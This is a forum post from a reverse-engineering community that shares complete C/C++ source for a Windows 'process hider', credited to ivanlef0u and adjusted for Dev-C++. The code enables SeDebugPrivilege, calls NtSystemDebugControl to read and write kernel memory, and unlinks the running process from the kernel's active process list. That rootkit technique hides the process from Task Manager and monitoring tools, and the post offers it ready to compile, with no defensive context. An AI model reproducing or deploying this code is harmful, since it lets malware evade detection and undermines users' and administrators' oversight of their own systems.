Jump to content
Tuts 4 You

Windows Process Hider


JMC31337

Recommended Posts

in no way is this my code at all:


simply added/modify 2 lines to make it work correctly for Dev-C++


 


1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);


2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");



#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <iostream>
using namespace std;
typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
//ivanlef0u's code
//xp sp2 ntoskrnl 5.1.2600, les chiffre indiquent la taille de la struct à passer en argument
typedef enum _DEBUG_CONTROL_CODE {
DebugSysGetTraceInformation=1,
DebugSysSetInternalBreakpoint, //0x38
DebugSysSetSpecialCall, //0x4
DebugSysClerSpecialCalls, //no args kill all special calls
DebugSysQuerySpecialCalls,
DebugSysBreakpointWithStatus,
DebugSysGetVersion, //0x28 //sources de reactos écrit par notre alex ionescu préféré ntexapi.h
DebugSysReadVirtual = 8, //0x10
DebugSysWriteVirtual = 9,
DebugSysReadPhysical = 10,
DebugSysWritePhysical = 11, DebugSysReadControlSpace=12, //0x18
DebugSysWriteControlSpace, //0x18
DebugSysReadIoSpace, //0x20
DebugSysSysWriteIoSpace, //0x20
DebugSysReadMsr, //0x10
DebugSysWriteMsr, //0x10
DebugSysReadBusData, //0x18
DebugSysWriteBusData, //0x18
DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE; typedef struct _SYSDBG_VIRTUAL {
PVOID Address;
PVOID Buffer;
ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; extern "C"
__declspec(dllimport)
ULONG
__stdcall
RtlNtStatusToDosError(
NTSTATUS Status
); #define PKPCR 0xffdff000 // <=> fs:[0] in KeLand //FUNCTIONS:
LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);
//Check OS and get the right Offset:
int CheckOSVersion( int &Offset )
{
//xWeasel's Code for checking OS's and setting the right Offset OSVERSIONINFO osvi; ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)
{
Offset = 0x88; //WinXP return 1;
}
else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)
{
Offset = 0xA0; //Win2000
return 1;
}
else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)
{
Offset = 0xA0; //VISTA
return 1;
}
else
{
return 0;
}
return 0;
} ULONG EnablePrivilege(char *Privilege)
{
HANDLE hToken;
ULONG Ret=1;
TOKEN_PRIVILEGES TP;
LUID Luid; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
Ret=0;
goto bye;
} if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
{
Ret=0;
goto bye; } TP.PrivilegeCount=1;
TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,
false,
&TP,
NULL,
NULL,
NULL))
{
Ret=0;
goto bye; } bye:
CloseHandle(hToken); return Ret;
} int HideCurrentProcess( int Offset )
{
*(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
SYSDBG_VIRTUAL Mem; if(!EnablePrivilege("SeDebugPrivilege"))
{
return 0;
} /**************** CURRENT ETHREAD ****************/
Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD
Mem.Buffer=&Addr;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** CURRENT EPROCESS ****************/
Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
Mem.Buffer=&Addr;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** PREV EPROCESS ****************/
Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&PrevEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** NEXT EPROCESS ****************/
Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&NextEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&NextEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
Mem.Buffer=&PrevEPROCESS;
Mem.Request=sizeof(ULONG); Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
if(Status!=STATUS_SUCCESS)
{
return 0;
} return 1; //SUCCED Stuff is hidden!!
} //MAIN FUNCTION int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG int Offset; if ( CheckOSVersion(Offset) == 1)
{
HideCurrentProcess(Offset);//OK to hide
MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG } return 0;
}

the original idea was by a bad @ss hacker ivanlef0u 


http://www.ivanlef0u.tuxfamily.org/


 


--Currently works under SP3


Edited by JMC31337
  • Like 2
Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...